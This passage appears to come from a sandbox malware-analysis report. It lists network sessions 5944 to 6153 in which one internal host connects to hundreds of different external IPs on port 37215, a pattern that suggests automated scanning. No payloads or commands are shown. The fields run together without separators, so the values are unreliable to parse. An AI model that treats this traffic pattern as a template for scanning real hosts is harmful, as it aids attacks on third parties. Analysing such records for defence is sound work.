                                                  5944192.168.2.133291819.241.136.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5945192.168.2.134116041.134.197.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5946192.168.2.1360210157.63.137.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5947192.168.2.1346586157.154.103.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5948192.168.2.1343700157.205.85.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5949192.168.2.1341520157.112.198.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5950192.168.2.1333250197.68.67.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5951192.168.2.136074241.208.131.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5952192.168.2.1353634197.35.27.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5953192.168.2.1335328197.162.157.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5954192.168.2.1343380157.161.31.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5955192.168.2.1342640157.98.228.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5956192.168.2.135359041.244.162.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5957192.168.2.135529841.45.238.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5958192.168.2.134126891.79.89.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5959192.168.2.1343210147.216.160.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5960192.168.2.134898041.208.118.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5961192.168.2.1335444157.17.40.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5962192.168.2.1341172157.153.5.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5963192.168.2.134366697.152.57.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5964192.168.2.1342174116.65.139.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5965192.168.2.1335254157.152.189.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5966192.168.2.1347470197.54.120.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5967192.168.2.136062876.45.229.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5968192.168.2.133855041.37.147.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5969192.168.2.1350372197.32.112.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5970192.168.2.135121241.84.70.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5971192.168.2.134327641.33.160.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5972192.168.2.1337206157.102.177.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5973192.168.2.1359680219.204.221.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5974192.168.2.133654441.94.45.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5975192.168.2.135468895.166.201.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5976192.168.2.1343464197.244.169.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5977192.168.2.136041841.118.41.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5978192.168.2.1350842197.166.12.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5979192.168.2.1333652157.130.161.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5980192.168.2.134305889.6.145.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5981192.168.2.134364232.246.253.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5982192.168.2.134979841.157.66.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5983192.168.2.134954241.122.69.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5984192.168.2.1356954197.24.133.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5985192.168.2.1335856157.91.50.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5986192.168.2.1358326201.244.62.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5987192.168.2.1335082197.166.186.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5988192.168.2.1356350197.129.141.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5989192.168.2.1335230197.4.133.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5990192.168.2.1350564157.22.23.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5991192.168.2.1352962157.171.114.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5992192.168.2.1341130157.5.119.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5993192.168.2.1359750197.234.186.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5994192.168.2.1348752157.125.100.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5995192.168.2.1343914206.30.87.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5996192.168.2.1349378157.132.148.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5997192.168.2.133665441.11.146.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5998192.168.2.135371441.39.40.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5999192.168.2.133952441.29.239.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6000192.168.2.1353798143.21.16.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6001192.168.2.1342668157.200.95.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6002192.168.2.1350730153.47.172.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6003192.168.2.135895051.17.224.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6004192.168.2.1342460197.151.123.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6005192.168.2.133407418.48.225.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6006192.168.2.1351100157.39.187.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6007192.168.2.1343972197.122.164.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6008192.168.2.1334018103.110.193.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6009192.168.2.1345606157.66.226.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6010192.168.2.1346154197.84.38.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6011192.168.2.136037841.44.233.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6012192.168.2.1360072197.107.68.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6013192.168.2.1341948157.236.158.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6014192.168.2.1344796197.254.95.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6015192.168.2.1352242197.205.146.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6016192.168.2.1337536205.64.73.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6017192.168.2.1340268197.51.16.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6018192.168.2.1335394157.195.204.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6019192.168.2.135112041.254.158.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6020192.168.2.1358322168.168.254.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6021192.168.2.1347874157.98.54.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6022192.168.2.135510067.163.154.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6023192.168.2.133288241.177.199.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6024192.168.2.1352344189.0.207.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6025192.168.2.1338290157.74.141.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6026192.168.2.134832478.242.1.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6027192.168.2.133792686.79.195.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6028192.168.2.1339436197.255.12.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6029192.168.2.1345638197.234.228.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6030192.168.2.1354198197.141.24.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6031192.168.2.1336724197.144.32.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6032192.168.2.134678241.57.234.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6033192.168.2.1343878197.4.93.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6034192.168.2.136076641.104.36.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6035192.168.2.134054041.76.165.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6036192.168.2.1354602122.22.148.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6037192.168.2.1354812167.23.191.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6038192.168.2.1336008221.24.95.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6039192.168.2.1358824115.228.99.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6040192.168.2.1339014197.225.147.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6041192.168.2.135999241.83.20.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6042192.168.2.1340654197.31.95.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6043192.168.2.1353504136.15.49.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6044192.168.2.133828467.16.244.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6045192.168.2.1340120197.55.69.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6046192.168.2.133521041.231.209.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6047192.168.2.1345876197.0.118.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6048192.168.2.1357836197.18.28.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6049192.168.2.135741041.63.129.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6050192.168.2.1340208157.4.42.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6051192.168.2.1353572157.81.133.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6052192.168.2.1357392157.247.237.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6053192.168.2.1356280197.37.246.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6054192.168.2.1342308157.6.98.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6055192.168.2.1352468197.31.243.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6056192.168.2.135883041.189.212.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6057192.168.2.1357946197.240.165.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6058192.168.2.134691641.86.167.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6059192.168.2.1360804157.54.54.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6060192.168.2.1353554197.74.61.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6061192.168.2.1352876157.233.187.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6062192.168.2.133969632.43.225.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6063192.168.2.1336596157.127.206.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6064192.168.2.134807289.133.9.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6065192.168.2.135775841.198.28.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6066192.168.2.1351030157.12.137.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6067192.168.2.1359782197.120.7.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6068192.168.2.134079468.179.76.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6069192.168.2.135161641.228.239.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6070192.168.2.1334948157.241.36.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6071192.168.2.1344374197.58.198.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6072192.168.2.134012449.200.48.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6073192.168.2.1340080197.44.146.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6074192.168.2.1360328197.136.159.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6075192.168.2.1343530157.246.30.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6076192.168.2.1342304110.19.144.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6077192.168.2.1345774157.167.110.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6078192.168.2.135225041.27.29.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6079192.168.2.135621041.247.243.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6080192.168.2.1345564179.255.131.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6081192.168.2.1352398197.174.73.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6082192.168.2.1359334157.16.128.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6083192.168.2.133653020.18.245.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6084192.168.2.1351440157.8.121.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6085192.168.2.1339954157.98.238.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6086192.168.2.1338952144.138.164.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6087192.168.2.135597841.58.241.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6088192.168.2.1351208197.42.33.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6089192.168.2.134309241.212.126.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6090192.168.2.1346586197.232.184.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6091192.168.2.133641241.19.143.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6092192.168.2.135426641.231.108.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6093192.168.2.135383692.153.30.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6094192.168.2.1339790197.49.210.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6095192.168.2.1358772197.141.162.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6096192.168.2.135461441.167.121.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6097192.168.2.1348368197.183.16.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6098192.168.2.1356390157.229.120.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6099192.168.2.1346920157.66.123.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6100192.168.2.1342674197.51.19.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6101192.168.2.134125841.233.21.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6102192.168.2.134122241.159.135.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6103192.168.2.1349224157.2.109.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6104192.168.2.134222041.141.69.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6105192.168.2.1346214157.187.151.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6106192.168.2.136057631.206.29.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6107192.168.2.1356198157.48.175.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6108192.168.2.1335046172.68.193.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6109192.168.2.1352738156.66.242.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6110192.168.2.1339204157.169.157.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6111192.168.2.1343820157.162.29.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6112192.168.2.1358840197.130.252.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6113192.168.2.1352390197.113.147.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6114192.168.2.1360462197.159.99.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6115192.168.2.1347592196.157.1.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6116192.168.2.135424041.190.214.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6117192.168.2.1352476157.137.250.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6118192.168.2.133834645.113.45.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6119192.168.2.1342070157.212.238.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6120192.168.2.133811241.65.63.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6121192.168.2.1347468157.108.17.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6122192.168.2.1342102157.148.11.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6123192.168.2.135988885.12.27.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6124192.168.2.1335346197.200.240.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6125192.168.2.1355270207.173.159.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6126192.168.2.134259281.93.119.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6127192.168.2.1348972157.77.79.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6128192.168.2.135696641.52.110.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6129192.168.2.134571841.185.161.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6130192.168.2.135363624.16.129.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6131192.168.2.135159841.27.142.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6132192.168.2.135243038.102.172.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6133192.168.2.1342050210.25.172.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6134192.168.2.1349916197.10.201.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6135192.168.2.1339010199.72.134.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6136192.168.2.1334948197.10.168.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6137192.168.2.1357970157.44.156.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6138192.168.2.135794041.167.142.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6139192.168.2.1334750197.64.233.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6140192.168.2.1356888157.211.45.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6141192.168.2.1340648157.220.113.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6142192.168.2.1349652157.27.210.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6143192.168.2.1349186197.14.62.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6144192.168.2.1349552157.22.244.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6145192.168.2.1355090157.24.39.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6146192.168.2.133790041.207.221.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6147192.168.2.1334440157.99.221.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6148192.168.2.1350138197.106.92.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6149192.168.2.135104041.171.86.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6150192.168.2.1338172197.128.133.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6151192.168.2.1342000197.120.34.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6152192.168.2.135335041.140.43.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6153192.168.2.136024437.25.0.12037215
